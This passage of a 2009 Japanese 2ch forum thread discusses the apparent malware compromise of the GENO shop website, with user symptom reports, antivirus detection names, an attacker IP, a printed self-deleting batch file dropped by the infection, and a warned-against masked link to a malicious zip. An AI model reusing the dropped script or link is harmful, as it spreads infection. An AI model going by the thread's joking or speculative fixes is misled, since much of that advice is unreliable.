>>452 genoの最後っ屁かもしれないよ
ご愁傷様です。
>>453 ベアボーンの頃から2日に1回ぐらい見てた
457 :
SM-3(福岡県) :2009/04/05(日) 00:25:18.30 ID:oHd+RwiM
要するに アクロバットリーダーが勝手に起動 アホみたいにメモリ食ってブラウザ落ちる→強制終了 に覚えがなければ問題ないんだな
>>450 よく分かんないけどOpera+Avast!+COMODO Internet Securityで来ました
AdobeReaderなし、javascript有効、avastで踏んで今さっき再起動してみたが、特に異常はなさそうだ
460 :
SM-3(東京都) :2009/04/05(日) 00:26:40.56 ID:NaygNVxS
genoは送料がなあ と思って1回も買ったことない
ここ数日はLinuxで遊んでgeno覗いてた俺にはセフセフな話か あーあ、ここは変なガラクタがあるから好きだったのにな
462 :
SM-3(東京都) :2009/04/05(日) 00:27:54.91 ID:GmVbvJLb
なんじゃこりゃあああああああああああああああああああああああああああああああ
なんかもうすでにいろんなスレに貼られ始めてるね
464 :
PAC-3(中部地方) :2009/04/05(日) 00:28:10.49 ID:NtPIQ/1E
>>453 ブラクラとか踏んで盛り上がってたら、一緒に踏みたくなるだろ?
465 :
PAC-3(アラバマ州) :2009/04/05(日) 00:28:23.93 ID:+VFQLBDt
昼間AdobeReaderが立ち上げてもないのに突然異常終了したのはこいつのせいか… FireFox3+AdobeRead8.1.1、avastのWebシールド「高」にしてるけど無反応。 システムの復元した方がいいのか? マンドクセ。。
ブラウザ落ちたぞ・・・やられたのかやっぱり
貼りまくってる奴は逮捕でおけ
469 :
PAC-3(アラバマ州) :2009/04/05(日) 00:29:42.34 ID:msw8sZrq
opera何も起きん
>>452 たぶんそちらも大問題になるはず。今回の騒動は
GENOもスルーのままでは済ませられないし。
代引きなら商品こなくても気にすることはないけどね。
471 :
PAC-3(東京都) :2009/04/05(日) 00:30:14.86 ID:kB6M0G9t
固まったが・・・
472 :
SM-3(奈良県) :2009/04/05(日) 00:32:13.30 ID:Oiq+thVw
473 :
PAC-3(三重県) :2009/04/05(日) 00:32:30.42 ID:zp3BrICF
お前ら! winlogin.exeが起動していたら今すぐタスク消せ!
<html>
<head>
<META HTTP-EQUIV='CHARSET' CONTENT='Shift_JIS'>
<META HTTP-EQUIV='CONTENT-LANGUAGE' CONTENT='Japanese'>
<meta http-equiv='Content-Type' content='text/html; charset=Shift JIS'>
<title>Ap\R?p\Rp[c???Vbvfdmn</title>
<meta name="description" content="IAp\R???VbvfdmnBi@o???BANZX?mF?I">
<meta name="keywords" content="Ap\R,p\R,p\Rp[c,?@,j^,m[gp\R,T[o[,TCN">
<meta name="author" content="GENO">
<meta name="verify-v1" content="9NtgdPv9e8UfOFJPFckDs3EjEAL1qhllG7ieKGSVdXo=" />
</head>
<!--framesetpHTML?body^O???_?Bwin????y[W???B-->
<frameset rows="65,*" border=0 MARGINEWIDTH=0 MARGINHEIGHT=0>
<frame src="TopMenu.html" name=topmenu MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=no noresize>
<frame src="MainMenu.html" name=main MARGINWIDTH="0" MARGINHEIGHT="0" scrolling=auto>
</frameset>
<!-- Google analytics -->
<script src="
http://www.google-analytics.com/urchin.js " type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-524772-1";
urchinTracker();
</script>
</html>
<!--//
SourceCheckerOn-line Ver 2.01
//-->
475 :
PAC-3(北海道) :2009/04/05(日) 00:33:21.33 ID:nM18M2te
何も起こらないな
/jquery.jsを通じてIEなら/?id=100、それ以外のブラウザなら/?id=101を呼び出しているようだが
どちらを呼び出してもやっていることは時刻を取得してcookieに書き込んでいるだけ
>>207 みたいにPDFやflashを呼び出すコードは書かれてないんだよな
アダルトサイトより危険なGENO
ふんじまったわ。あどべりーだーが何か今日調子悪くて 復元したけど、firefox落ちまくった。 オンラインスキャンしたが何もひっかからずだが、 conime.exeは起動してた。
>>464 もちろん要らないPCに砂箱入れてやってるんだよな?
まさか尼で買い物したりいつもメールみてるPCではやってないよな
抜かれたらもうどうしようもないしな
Avast大勝利ですねー
どこのファイルをスキャンすればいいのですか
481 :
遺憾の意(コネチカット州) :2009/04/05(日) 00:35:07.92 ID:CdixeYRO
売王やジェノのおもしろ電子雑貨やジャンク見るのが楽しい たまたま今日見てなくて良かった
483 :
SM-3(福岡県) :2009/04/05(日) 00:36:02.74 ID:oHd+RwiM
ついでだしひさしぶりにクリンインスコすっかなぁ
>>473 winlogon.exeに見せかけた巧妙なウイルスか
システムの復元でもだめか。まだ対応してないのが痛いな。 まー数日で、ノートン先生なりバスター師匠でも 対応はすると思うが、情報に関してはもうね。
最近までプリンタのことで調べまくってたからあぶなかった… 今もう大丈夫なの?
487 :
PAC-3(神奈川県) :2009/04/05(日) 00:38:02.56 ID:1gsBJZYu
genoは前から2ch嫌ってるからな、わざと仕込んだんだろうな
488 :
市民団体(静岡県) :2009/04/05(日) 00:38:41.30 ID:Co8Chmg9
hosts弄って接続できなくする奴どうやるんだっけ
489 :
九条(アラバマ州) :2009/04/05(日) 00:38:54.05 ID:lcX048f5
490 :
PAC-3(千葉県) :2009/04/05(日) 00:39:55.15 ID:9Adf0bya
踏んだ奴は一応PC再起動前する前にレジストリを開いて Windows起動時に実行するプログラムに登録されている内容を良くチェックしてから再起動したほうがいい。 てか、無闇に再起動すると逆に命取りになる可能性もあるし。 レジストリの項目名がわかんない奴はいじくるつーる等のレジストリを覗けるツールを使って確認するのが良いと思う。 ちなみにいじくるツールはJwordをインスコしない様にくれぐれもインストーラのチェックボックスを良く確認してインスコする様に。
491 :
PAC-3(中部地方) :2009/04/05(日) 00:40:09.36 ID:NtPIQ/1E
492 :
SM-3(関西地方) :2009/04/05(日) 00:41:19.73 ID:JPcqsyiP
>>488 これ?
287 ネット君臨派(兵庫県) New! 2008/09/29(月) 16:49:35.44 ID:T1ofshAP0
C:\WINDOWS\system32\drivers\etc
の
hosts ファイルに
127.0.0.1[TAB]omanchin.com
を追加しろ
[TAB]はTABキーを一回押せ
これで2度とオマンチンに接続出来なくなる
Sleipnir+Avast!+COMODO Internet Security+spybotで無問題 同じく、Firefox3、Operaでも変化無し。
494 :
PAC-3(徳島県) :2009/04/05(日) 00:43:59.55 ID:qBMLTRpS
あした出かけるからそろそろ寝ないといけないのに パソコンのことが気になって眠れない。。。 こんなにむかついたのローパスの個人情報漏洩以来だわ。
495 :
PAC-3(アラバマ州) :2009/04/05(日) 00:46:31.18 ID:LUUoQIUE
hostsはあくまで名前解決をするものだから、IPアドレスを直に指定されたら無力。
>>359 みたいな使い方はできんだろ。
ゲノのサイトを開いただけでアウアウなのか
497 :
:2009/04/05(日) 00:49:48.96 ID:bFnFS3YT
まだ踏んでないんだけどどうしたらいい?
499 :
PAC-3(埼玉県) :2009/04/05(日) 00:51:03.37 ID:MwWpQ7kk
とりあえず踏んで感染したか否かを確かめる
クラックされたのは www.geno.co.jp だけどgeno-web.jpのサーバも同じ Apache/2.2.3 (CentOS) だから 同じようにやられる穴はありそうだよね。
501 :
PAC-3(神奈川県) :2009/04/05(日) 00:51:27.69 ID:D1ll0gEQ
一応AdBrockで94.247.*.*をブロックするように設定したけど、これでいいの?
一昔前価格コムでもこんな騒動あったよね
503 :
:2009/04/05(日) 00:53:00.45 ID:bFnFS3YT
開いてめちゃくちゃメモリ使用量増えたけどどうすりゃいいの。
505 :
遺憾の意(関東) :2009/04/05(日) 00:53:33.54 ID:Kqy1QCk3
開いたら固まった メモリ使用量が大変なことになってた 環境は カスペ Firefox3 アドベ9.00 だった
時間的に仕方ないがまだGENOの方では対応する気なしか。 今でもお得情報みようと、新たな犠牲者が増殖中の状態とはな。
507 :
SM-3(東日本) :2009/04/05(日) 00:56:37.83 ID:MRFRGNV7
おれ、つい3日前に代引きで個人情報書き込んで買い物したんだが・・・ 注文確認メールがちゃんと届いたからセフセフだよな?
もう夜中だから対応は月曜日かな
>>507 安心したいのは判るが、それだけではなんとも。
510 :
SM-3(長屋) :2009/04/05(日) 00:57:30.13 ID:v0YiXEB0
ちゃんと届いたんなら逆にアウトじゃね?
踏まなくてよかったわ
2日前見た気がしたけどなんともなかったな とりあえずアク禁設定した
>>507 商品が来るという意味では大丈夫かもしれんが
個人情報の流出という意味では大問題なような
まだGENOのほうで情報把握してないみたいなのが恐ろしい
516 :
PAC-3(千葉県) :2009/04/05(日) 01:00:12.23 ID:9Adf0bya
>>511 このウィルスとは別に鯖内にあるアカウント情報とか顧客情報が抜かれている可能性もありうるからね。
いずれにしても急にスパムメールがやたら届くようになったなんて場合は
そーいう面でメルアドが流出しちゃってたなんて可能性もありうるし。
>>423 ならあれだ、BDコマンドプロンプト版を使ったからかも知れんな
>>506 のアドレスって何?
これもgenoへの短縮リンクか何か?
Chromeはシークレットモードなら大丈夫かね
520 :
SM-3(長屋) :2009/04/05(日) 01:02:21.12 ID:v0YiXEB0
実店舗はないの? 普通あるよな
522 :
市民団体(愛知県) :2009/04/05(日) 01:04:50.94 ID:HPZej8UE
ここ、誠意の無さで有名だもんね
本スレには社員が常駐してるから知ってはいるんじゃないの
FIREFOX3とIE7が固まった(PFがひどいことになった)
Chromeは何もおきなかった
HP製作者がなにかチョンボしたんじゃないの?
ちなみにこのサイトを見ても94.247.2.195につなぎに行こうとはしない
>>1 が別のサイトで変なウイルス引っ掛けてきたんじゃないの?
525 :
PAC-3(アラバマ州) :2009/04/05(日) 01:06:51.77 ID:JIJjXXtj
今日Genoのサイト見た後Paypalのアカ作って海外通販使った俺終わったな
526 :
PAC-3(群馬県) :2009/04/05(日) 01:07:03.30 ID:Ca48GkkG
知らずにTOPページアクセスしたけど開くのに時間掛かったけどアドビリーダー6.0は起動しなかったぞ セフセフ?
firefoxで繋ぐと94.247.2.195となんかやってるね
528 :
九条(千葉県) :2009/04/05(日) 01:07:59.14 ID:fmM9esU1
ここ最近2ちゃんでおもちゃにされてたから復讐のつもりで知ってて放置してんじゃねえのw
530 :
九条(新潟県) :2009/04/05(日) 01:09:35.63 ID:88U7bik4
あぶねー…今のOSを入れる際にAcrobat Readerはすぐ消してFoxit Readerに切り替え、 JavaとJavascriptは基本的に無効にしていたから助かった。 こうなるとGENOの顧客情報管理サーバもやられていると考えるべきだよね? 一度でも買い物をした人は情報ゴッソリもって行かれたのか?
評判悪いのか
さっきまでドスパラとかワンズで新規に組むPCの見積もりしてたからマジで焦った よかったgeno使ったこと無くて・・・マジでこういうの心臓に悪いからやめてほしい
夕方ゲノみて今このスレみてるんだが・・・ タスクマネージャー眺めてるとcmd.exeが定期的に動いてるWWW アウアウだよな?
>>533 そりゃあもうお前やばいってもんじゃないwwwwwっうぇっうぇwww
ブラウザからお前のハードディスク丸見えwwっうぇwww
ハースッキリした
>>533 俺何回もゲノ開いてるけどそんな症状にならないよ?
ルートにu.batってのが作られてたorz 中身は以下のとおり :Z DeL "K:\_.t" IF EXIST "K:\_.t" GOTO Z DeL "K:\u.bat" こことは関係ないかもしれんが何かにやられたのか確実だorz
537 :
SM-3(埼玉県) :2009/04/05(日) 01:15:42.29 ID:KVAjhyIK
>>531 怪しいものが多い
少し前、LGのDVD-Rドライブの偽物(型番だけ合わせた改変ファーム入り)が出回ったときも
売り続けたのはここだったし
修正済みの脆弱性なのかな ゼロデイでは無いの?
539 :
PAC-3(関西地方) :2009/04/05(日) 01:18:21.81 ID:RWJM15SI
540 :
PAC-3(埼玉県) :2009/04/05(日) 01:20:07.65 ID:MwWpQ7kk
タスクマネージャで System Idle Process ってのがCPU食いまくってる奴は 恐らく感染してる。注意しろよ!!
ここのサイト作ってる会社に面接行ったんだがw
542 :
PAC-3(岐阜県) :2009/04/05(日) 01:21:57.29 ID:LUL11HGR
今時ジャバスクOFFなんて時代遅れとか言ってた奴らはどこ行ったよ
543 :
九条(東京都) :2009/04/05(日) 01:22:19.14 ID:0nXwYLXD
Adobe Reader ってデフォルトではブラウザの中に起動されるんじゃないか? 小さく起動してたら気付かないと思うぞ?
545 :
九条(埼玉県) :2009/04/05(日) 01:24:02.06 ID:Z0qQPuBb
>>540 そういうことはいわないのw
ここ二・三日に踏んだかどうか覚えてない人はどうやって確認できるかな?
記憶があいまいなんだよな
踏んでなくてセーフなんだが参考までに情報をくれ AntiVirとかAvastは反応したの? あと本物のタスマネはなんて名前なんだ?
昨日バスターの不正変更の監視が反応したのはこれだったのかな。 ~.exeがどうのこうのって出たんで拒否したけど間に合わなかったのか?
>>527 アドベリーダーには丸ウェア入ってるからそれじゃない?
551 :
市民団体(滋賀県) :2009/04/05(日) 01:32:52.62 ID:DoeXUfa6
〜exeあったら危険、どうすればいい? いつからこんなVIP臭いレスするようになったんだ
>>547 なんでそんなWindows95みたいなスキンにしてんの?
>なんでそんなWindows95みたいなスキンにしてんの? キリッ AA略 だっておwwwwwwwwwwwww
>>552 軽くなるらしいよ
成田の入管もそのスキンだった
556 :
PAC-3(北海道) :2009/04/05(日) 01:36:26.69 ID:nM18M2te
557 :
SM-3(アラバマ州) :2009/04/05(日) 01:39:04.33 ID:1sxoHNwk
スパイボットで検索してたら何種かトロイが出てきた
558 :
PAC-3(岐阜県) :2009/04/05(日) 01:39:08.33 ID:LUL11HGR
>>10 カテゴリ表示で大量の記事表示される訳か
1ページ制限とか無いのかね
XPではThemeサービス止めるのがデフォだろ
今別領域から立ち上げてノートンでオンラインチェック中orz バスターではかすりもしなかった。
カスペですら突破されてるのにバスター・ノートンなんて 遅延対応ソフトが検出できるはずがない。 でも自己設定次第だがフリーAVASTはブロックしてるらしいな。
今月の2日に見つかったおニューなウイルスって書いてあるな
567 :
PAC-3(北海道) :2009/04/05(日) 01:52:44.44 ID:zE4vGLsF
結局、どうすればいいの?
>>10 ふざけんなよ
いきなりメモリ700M近く持ってたぞ
CPUも80%平均だし
おおー万全を期して4/1に戻した俺イカス
レタスの中の人何故だか人来るな〜って精力的に頑張ってるんだろうなw
これを機にアンチウィルスだけじゃなくて砂箱入れるようにしたほうが良いよ 被害が少しは減少するから
572 :
SM-3(中部地方) :2009/04/05(日) 01:55:18.02 ID:sh57WKtI
ノーガードで踏んでも感染しないんだが
送信先わかってるんでしょ? みんな飽和攻撃してるのか?すでに。
575 :
PAC-3(群馬県) :2009/04/05(日) 01:55:54.09 ID:Ca48GkkG
384 名無しさん@編集中 sage 2009/04/05(日) 01:19:25 ID:MCOisT8p
いまシステムの復元してウィルスチェックしているが
よくわからん
再インストしてローレベルフォーマットしないと
ダメかな?
385 名無しさん@編集中 sage 2009/04/05(日) 01:31:08 ID:Bvc2ZB43
ウイルス感染でパーテ開放→クイックフォーマットてのはやった事あるが、
ローレベルフォーマットまでやった事は無いな・・・
もしかして間違った対処してたのか・・?
386 名無しさん@編集中 sage 2009/04/05(日) 01:43:51 ID:60tVy6Z1
>>361 マジで通報しました
ウイルス流布は3年以下の懲役、またはは50万円以下の罰金です
387 名無しさん@編集中 sage 2009/04/05(日) 01:43:52 ID:YMpr/blu
>>384 ブート領域をやられてると、それではだめ。
昨日の俺がそうだった。
576 :
PAC-3(秋田県) :2009/04/05(日) 01:56:08.36 ID:a3zeUutd
レタスの人に誰か指摘してやれよ こんな糞重ブログ二度とアクセスしたくないぞ
ウィルススキャンしたが何も見つからなかったので システム復元したわ
>>573 genoよりそこに通報したほうがことが早そうだなw
579 :
PAC-3(北海道) :2009/04/05(日) 01:57:03.25 ID:zE4vGLsF
Adobe Readerの8.1.4だったら問題ないの?
580 :
SM-3(愛媛県) :2009/04/05(日) 01:57:05.93 ID:nl1nvIN6
ローレベルフォーマットしないと削除できないウイルスなんてあるのかよww
社員12名?こりゃダメだw
一つのことにこれだけ情熱注げられるのは尊敬するわー しかもレタスだし何がそこまで駆り立てるのか
583 :
PAC-3(北海道) :2009/04/05(日) 01:57:46.46 ID:nM18M2te
>>563 Adobe Readerのバージョンはやっぱり8.1.1以前だったの?
誰が仕込んだんだろう本当に2ちゃんへのリベンジだったらホレタ
>>582 家もレタスをつくってるからブログ自体に凄く興味ある
家庭菜園のレタスでももっさーーーーーってなるからすごい
586 :
SM-3(愛媛県) :2009/04/05(日) 01:59:31.44 ID:nl1nvIN6
俺も危うくレタス作ろうかという気になってたし 少しは宣伝になってるだろうな
587 :
SM-3(関西地方) :2009/04/05(日) 01:59:33.30 ID:mlDvQQqB
IE6+Adobe Readerの7.0英語版で踏んだけど特になんともない ワイヤーシャークでもへんなパケットはでてないけどな
588 :
九条(埼玉県) :2009/04/05(日) 01:59:53.51 ID:Z0qQPuBb
590 :
PAC-3(群馬県) :2009/04/05(日) 02:01:27.75 ID:Ca48GkkG
IE6+Adobe Reader6.0 でも自動起動してないが心配R二乗
591 :
SM-3(愛媛県) :2009/04/05(日) 02:01:53.02 ID:nl1nvIN6
>>573 これ見るとデータベースはそこの会社に置いてるようだけど
…まだ安心はできないか
もう4時間(AVGとトレンドオンライン)もウィルススキャンしてるお シングルはつらい
メモリはいつも通りだな。何かされててもわからんがw
>>589 いつもネタで貼られてるけど中の人は真剣なんだな
2009年4月2日 カナダ産のウイルス。以下が対応しているソフト↓
>>564 から、
eSafe 7.0.17.0 2009.04.02 Suspicious File
GData 19 2009.04.03 Win32:KillAV-KS
Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent
Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg
McAfee+Artemis 5573 2009.04.03 Generic!Artemis
Prevx1 V2 2009.04.03 High Risk Cloaked Malware
Sophos 4.40.0 2009.04.03 Mal/Generic-A
TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
なんか不安になってきた クラスタレベルでのバックアップ、復元ならよっぽど大丈夫でしょ? 大丈夫と言ってくれ
598 :
PAC-3(群馬県) :2009/04/05(日) 02:06:16.99 ID:Ca48GkkG
>>596 TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001
バスターはセフセフなの?ねえったら!
599 :
市民団体(静岡県) :2009/04/05(日) 02:06:24.78 ID:Co8Chmg9
CPU 100% 突然
600 :
九条(新潟県) :2009/04/05(日) 02:06:38.81 ID:yiBYwWBA
今仮想マシンで踏んで来たけど何も問題ないっぽかった アドビ入れてると危ないの?
ウイルスかかると何されんのよ
603 :
PAC-3(アラバマ州) :2009/04/05(日) 02:07:00.41 ID:88g6Gap6
Windows Vistaアンチウィルス無し Firefox 3.0.8 JavaScriptオン Adobe Reader 8.1.3 この環境でたっぷり踏んでしまったけど PDFを開こうとはしなかったし、とりあえずなんともないみたい
605 :
SM-3(九州) :2009/04/05(日) 02:08:00.14 ID:Qkw3vs81
おまえらウイルス過敏過ぎて笑える
606 :
PAC-3(群馬県) :2009/04/05(日) 02:08:27.57 ID:Ca48GkkG
アドビリーダが自動起動した奴の環境が知りたい
日曜日のお昼はもっと感染者増えるだろうね
オペラですっかり開きました
opera アンチウイルスなし ウィンドウズ2000 テキトウなアクロバットリーダー スレイプニルだとポップアップでブロックするけど許可してみたら開いた
611 :
九条(関東・甲信越) :2009/04/05(日) 02:14:47.78 ID:pNk2Lxtr
ん?スキャンしても見つからないとか疑心暗鬼にさせんなや
ブラウザの履歴見ると金曜にアクセスしてた いつからウイルスばら撒いてたんだよ
Adobe Reader 8.1.2 でギリギリだったけど起動エラーが出た ほっといたらSleipnirもエラーで落ちた バスター2007は無反応だったよ 面倒くさくて2009にしてないのが悪いけど
AVG+PCTOOLS niftyオンラインスキャン(カスペル) fなんたらオンラインスキャン 両方異常なし
615 :
PAC-3(千葉県) :2009/04/05(日) 02:16:37.52 ID:9Adf0bya
>>612 それがわかんないんだよね。
だからみんな不安がっているってのもある。
おいらもその一人。
c:\u.bat c:\_.t c:\u.ba もない?なんだろうね
>>604 遅レスだけどReaderの改良版って8.1.4みたいだな、8.1.3は未対応なんじゃ
9.1や8.1.4なら安心かどうかは分からないけど
genoは公表しないのか
619 :
PAC-3(関西地方) :2009/04/05(日) 02:19:02.66 ID:RWJM15SI
Acrobat更新してないやつが悪い。解散
620 :
PAC-3(千葉県) :2009/04/05(日) 02:19:32.00 ID:9Adf0bya
>>616 もしかするとアドミン権限無しの垢でgenoのサイトに行った場合と
アドミン権限ありの垢でサイトに行った場合でも挙動が違うのかもしれないね。
アドミン権限なしなのでbatファイルの生成が出来なくて被害を被らなかった可能性もあるかと。
管理者権限ないと使えないツール多いからなぁ・・・
>>596 SuspiciousやGenericは疑いがあって検出してるだけで
完全に防ぎきれているか不明
>>617 む、そうするとFirefoxの段階で食い止めたのかな?
Readerプラグインは入ってたはずなんだけど
625 :
PAC-3(東日本) :2009/04/05(日) 02:25:22.48 ID:WTQymExe
626 :
PAC-3(中国地方) :2009/04/05(日) 02:25:23.29 ID:4+eSgXP5
ところでどこかと通信してるっていうのは何を送信されてるの? HDDの中身とか?
>>625 わざとじゃないwwww素で抜かしたwww
629 :
PAC-3(北海道) :2009/04/05(日) 02:27:05.55 ID:nM18M2te
現時点ではどのソフトもヒューリスティックでしか検出してない感じがする
630 :
SM-3(アラバマ州) :2009/04/05(日) 02:27:40.00 ID:1OO/7q3C
631 :
SM-3(アラバマ州) :2009/04/05(日) 02:28:22.83 ID:bgG3HYOY
>>573 そうそう
そこに面接に行った
採用人数少なかったので落とされたが
たしかシステムはマックサーバーで動いてるって言ってた
632 :
PAC-3(東日本) :2009/04/05(日) 02:28:27.31 ID:WTQymExe
634 :
SM-3(アラバマ州) :2009/04/05(日) 02:29:12.33 ID:1OO/7q3C
635 :
PAC-3(千葉県) :2009/04/05(日) 02:29:13.29 ID:9Adf0bya
>>627 誰もパケットの中身を解析した結果を晒していないから判らないけど、
WindowsのライセンスIDとか、利用者名とか、なんかのパスワードとかメルアドとか
そーいうデータが送信されちゃうのが、この種のウィルスのお約束。
結局、レジストリの中の特定のキーに記載されているデータが流れちゃう。
636 :
SM-3(長屋) :2009/04/05(日) 02:30:02.08 ID:sJtyDENu
誰か
>>10 のリンクをCorei7を持っていてクリックしたい勇者はいらっしゃいませんでしょうか?
638 :
PAC-3(千葉県) :2009/04/05(日) 02:31:42.48 ID:9Adf0bya
>>636 最近は簡単にアク禁しまくりだから調子に乗って張りまくらないほうがいいよ。
何日頃からGENOにウイルスが仕込まれて始めたのよ。 とりあえず木曜日以降は アクセスしてないんだけど。
そこのサイト、一度も見たことないんだけど、 大丈夫?
>>634 検出できるソフト一覧やり直したよ粕
●a-squared 4.0.0.101
2009.04.03 Trojan-Spy.Agent!IK
●Avast 4.8.1335.0
2009.04.03 Win32:Daonol-L
●eSafe 7.0.17.0
2009.04.02 Suspicious File
●GData 19
2009.04.03 Win32:KillAV-KS
●Ikarus T3.1.1.49.0
2009.04.03 Trojan-Spy.Agent
●Kaspersky 7.0.0.125
2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
2009.04.03 Generic!Artemis
●Prevx1 V2
2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
2009.04.03 PAK_Generic.001
645 :
PAC-3(千葉県) :2009/04/05(日) 02:36:30.34 ID:9Adf0bya
早い話がサイトチェッカーを入れたブラウザで行きたいサイトのURLをコピッてググれば一目瞭然ってことかな?
>>207 Windows98で踏むとウイルスpdfを返してこないっぽい
650 :
SM-3(大阪府) :2009/04/05(日) 02:39:31.60 ID:o89sZJwL BE:960086674-2BP(1122)
>>645 ニコ動のアカウント位しか入れてないが変えてくるか
>>639 4月4日早朝説が有力だけど…、確定情報無し
653 :
PAC-3(コネチカット州) :2009/04/05(日) 02:40:32.04 ID:uVA9mQjx
アドビ9使ってノートンでスキャンしたけどクリーンインスコしとけば完全に安心だよな?クレカも使ってるしこのあいだもヤフオクしたしやばいかな?
あれ?
>>10 は前にXP上のFirefoxで見たらブラウザ落ちてたけど
Ubuntu上のFirefoxで見たら完走したよ
この違いは何なんだ
655 :
PAC-3(東日本) :2009/04/05(日) 02:40:47.31 ID:WTQymExe
vista operaでgenoを踏んだが異常なし。
>>616 Chrome + Adobe Reader 9.1.0 で踏んだがそれなかった
Readerさえ更新していればセーフ?
>>647 画像読み込みが完了したあと、IEが反応無しになったんで、
「×」押して終了させた。キャプは試してないなぁ。
>>631 しかし落ちてよかったな。
注文を0.1にできたり、漢字変換すらできない会社だぜ…。
俺は、カスペと先生とアバ入れてたから助かったよ ちょっと重いけど我慢してた甲斐あったw
660 :
PAC-3(東日本) :2009/04/05(日) 02:42:09.02 ID:WTQymExe
>>653 あわてるな。環境によってはそのままでいいわけだから。
引っかかったPCの環境を知りたい
661 :
PAC-3(千葉県) :2009/04/05(日) 02:42:16.05 ID:9Adf0bya
>>648 多分、jQueryがIE5とかネスケ4.7とか、古いブラウザに対応していないから
単にスルーされちゃっているだけかもしれないけど、ぶっちゃけ、よくわかんないな。
>>657 CPUモニターを表示した状態でもう一度トライできませんでしょうか?
663 :
PAC-3(千葉県) :2009/04/05(日) 02:43:34.01 ID:9Adf0bya
>>651 どの道仮想PCなら踏む前に保存してたイメージファイルから復元するだけだろうがw
0.1ってそういう意味だったのかワロス
>>648 >>661 OSやIE偽装してみてアクセスしたらどう?
ウイルスにひっかからなかったら バージョンで判断
ひっかかったらバージョンで判断じゃなくjQueryが対応してないだけ
復元は出来ても持っていかれた情報は取り返せない
それは言わない約束だぞ
668 :
SM-3(岐阜県) :2009/04/05(日) 02:45:01.62 ID:68QmPOg2
>>139 さすが俺のavastとa-squared
669 :
SM-3(アラバマ州) :2009/04/05(日) 02:45:14.04 ID:bgG3HYOY
>>658 社長は年内にマザーズに上場するって言ってたんだが
こりゃ無理かもしれんなw
そういえば、固まったときに再起動かけたら、@@@@@で埋め尽くされている内容を PDF経由ではき出そうとしてたわ。だけど、宛先欄やっcc欄は空のままで、 普通に 送信 キャンセル などの選択ができた。 もちろんキャンセルしたけど・・ 火狐閲覧でreaderは8.12だったけど・・ ・・・もうどうでもいいや。俺の個人情報なんて安すぎる代物だし・・・
671 :
PAC-3(千葉県) :2009/04/05(日) 02:45:21.71 ID:9Adf0bya
>>665 わざわざそこまで解析する程、気合入ってないです><
>>664 0より上で1以下の数値が入れられる状態だったから
0.1とか0.001とかでも 商品が買える状態になってたw
金額も *個数だから当然1/10とかになっちゃうわけで。
で在庫数が 54.00987とかになっててワロタ
あ、あとここに専ブラで書き込んだら、なぜか初回起動時のときのように、 書き込みに関する同意を求められた・・・やっぱなんかあるのかな・・・
>>669 ここの導入事例の会社 半分近くがサイト閉じてるぞw
676 :
SM-3(大阪府) :2009/04/05(日) 02:47:06.15 ID:o89sZJwL BE:342888252-2BP(1122)
>>662 CPUモニタってのが分からない(;^ω^)タスクマネージャとは別物?
javascript:alert(document.lastModified)←これ貼り付けたらHPの最終更新日確認できないかな 感染以降にgenoが更新してたら無駄か…
>>677 タスクマネージャのそれを表示した状態でというつもりだったのですが(苦笑)
>>663 設定は保存できるだろ・・・・・
returnilあたりで仮想化してりゃ話は別だが
682 :
PAC-3(コネチカット州) :2009/04/05(日) 02:48:55.46 ID:uVA9mQjx
>>660 もうクリーンインスコしちゃったw環境とは?
683 :
PAC-3(千葉県) :2009/04/05(日) 02:48:57.71 ID:9Adf0bya
684 :
PAC-3(東日本) :2009/04/05(日) 02:49:07.25 ID:WTQymExe
>>674 IPが変わったからじゃないか?再起動したでしょ
>>673 なおった。注文したユーザーには、
件名に「キャンセルしました」 ってメールが届いた。
しかも内容はなし。何も書かれてないw 件名だけ
振り込んじゃったユーザーもいったらしいけど、
金は返ってきてないとかなんとか。本当か知らんが。
ユーザーのデータごと丸ごと消したのかも知れんね。
>>685 ひでえな
前々からgenoの悪評は聞いていたが。
>>683 suka=pontanの時もそうだけど
こんなの変更するのに意味ないのにうぜえ
688 :
PAC-3(千葉県) :2009/04/05(日) 02:51:44.92 ID:9Adf0bya
>>687 まぁ、運営の連中の遊びだからな。これはw
>>665 あれ…
今はUA弄ってもPDF返してくる…
さっきのはなんだったんだろう
690 :
SM-3(鹿児島県) :2009/04/05(日) 02:51:56.35 ID:K8Lh8tvx
まだGenoが対策取ってないから さらに新しいウイルスを仕込まれる可能性もあるな
692 :
PAC-3(北海道) :2009/04/05(日) 02:52:45.91 ID:nM18M2te
694 :
PAC-3(愛知県) :2009/04/05(日) 02:53:07.82 ID:Zk9fICxz
踏んだけど、プラグイン追加しろとか言われて何もおきなかった
695 :
九条(千葉県) :2009/04/05(日) 02:54:18.73 ID:YlHbFX71
おぉ・・ちょっと安心したぜよ
あ、いつ この悪意あるスクリプトが組み込まれたか ieHTTPHeaders使えばわかるんじゃない? 更新日みれば。 俺は踏めないが。
こんなのを貼ってるやつもいるので注意
これもgenoに飛ぶ↓ (
http://を*に置換 )
147名前: SM-3(中部地方) []投稿日:2009/04/05(日) 02:15:51.13 ID:sh57WKtI
>>86 *******go.2ch2.net/u/V2Afcq?mofu4_2137.zip
702 :
PAC-3(千葉県) :2009/04/05(日) 03:01:41.92 ID:9Adf0bya
>>692 IPAならATOKの件を払拭したくて無駄に張り切りそうだよねw
703 :
SM-3(catv?) :2009/04/05(日) 03:03:09.76 ID:V0zpxxnR
>>361 のウイルスはブラウザのJavaを切っていても、AcrobatプラグインからAcrobatのJavaを使って感染するのか。
なんでpdfにJavaが必要なんだ?
>>701 消し忘れてた\(^o^)/
まぁいいや。
706 :
SM-3(福岡県) :2009/04/05(日) 03:03:45.66 ID:oHd+RwiM
www.geno-web.jp開いたけど何もなかった。 一時的にブラウザが応答なしになったけど数秒で復帰した。 これって問題ないの? Sleipnir 2.84 & IE8 WinXP SP3 Reader 9.12 Professional 8.1.4 普段はProfessionalで開いてるみたい Norton先生2009 体験版
708 :
PAC-3(千葉県) :2009/04/05(日) 03:05:05.01 ID:9Adf0bya
>>706 狐さんにZIPスレ禁止令を出してもらわないと駄目かもわからんな。
>>709 日本時間?
>326 :名無しさん :sage :2009/04/04(土) 10:43:40 0
10時には報告されてるし、更新されたってことか?
